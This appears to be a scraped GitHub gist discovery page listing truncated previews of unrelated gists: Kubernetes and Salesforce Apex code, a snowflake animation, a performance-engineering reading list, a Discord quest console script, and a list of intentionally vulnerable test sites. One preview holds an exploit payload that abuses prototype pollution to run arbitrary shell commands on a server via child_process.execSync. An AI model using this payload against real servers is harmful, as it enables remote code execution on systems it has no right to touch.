The VCell AI Assistant is an AI-powered biomodel analysis platform that integrates conversational AI with structured access to the VCell biological modeling database. It enables researchers to search, analyze, and interact with biomodels, publications, and research papers using natural language queries, AI reasoning, and semantic search. The platform supports both traditional database queries and AI-enhanced analysis, including diagram visualization and knowledge base exploration.
Discover gists
This bash file fetches all the Kubernetes RBAC resources and sub-resources.
This gist adapts and improves the following (excellent) file by Sam Culley:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- HTML --> | |
| <div class="snowflakes" aria-hidden="true"></div> | |
| <!-- JavaScript --> | |
| <script> | |
| const snowflakesContainer = document.querySelector('.snowflakes'); | |
| // Number of snowflakes you want to add | |
| const numberOfSnowflakes = 100; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * @description : | |
| * @author : Amit Singh | |
| * @group : | |
| * @last modified on : 08-15-2022 | |
| * @last modified by : Amit Singh | |
| **/ | |
| trigger AccountsTrigger on Account (before insert, before update) { | |
| if(Trigger.isInsert){ | |
| Accounts.onBeforeInsert(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * @description : | |
| * @author : Amit Singh | |
| * @group : | |
| * @last modified on : 08-18-2022 | |
| * @last modified by : Amit Singh | |
| **/ | |
| public with sharing class AccountGeoCode { | |
| /* | |
| * @description : Using Google Api to get the Latitude and Longitude of the address |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * @description : | |
| * @author : Amit Singh | |
| * @group : | |
| * @last modified on : 08-20-2022 | |
| * @last modified by : Amit Singh | |
| **/ | |
| public with sharing class CreditCardPayment implements IPaymentSystem { | |
| public void processPayment(){ |
- Parallel Computing Course - Stanford CS149, Fall 2023
- Performance-Aware Programming Series by Casey Muratori
- Algorithms for Modern Hardware
- Computer Systems: A Programmer's Perspective, 3/E - by Randal E. Bryant and David R. O'Hallaron, Carnegie Mellon University
- Performance Engineering Of Software Systems - am MITOCW course
- Parallel Programming 2020 by NHR@FAU
- Cpu Caches and Why You Care - by Scott Meyers
- [Optimizing a ring buffer for throughput](https://rig
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async () => { | |
| // === CONFIGURATION === | |
| const cmd = "touch iWasHere"; // The command you want to run | |
| const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain) | |
| console.log(`[*] Attempting to run command: ${cmd}`); | |
| // 1. Construct the malicious payload | |
| // This injects the command into a child_process.execSync call and throws the result in an error digest | |
| const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('${cmd}').toString('base64');throw Object.assign(new Error('x'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`; |
Note
This does not works in browser for quests which require you to play a game! Use the desktop app to complete those.
How to use this script:
- Accept a quest under Discover -> Quests
- Press Ctrl+Shift+I to open DevTools
- Go to the
Consoletab - Paste the following code and hit enter:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://vulnweb.com/ | |
| http://testhtml5.vulnweb.com - nginx, Python, Flask, CouchDB | |
| http://testphp.vulnweb.com - Apache, PHP, MySQL | |
| http://testasp.vulnweb.com - IIS, ASP, Microsoft SQL Server | |
| http://testaspnet.vulnweb.com - IIS, ASP.NET, Microsoft SQL Server |
NewerOlder
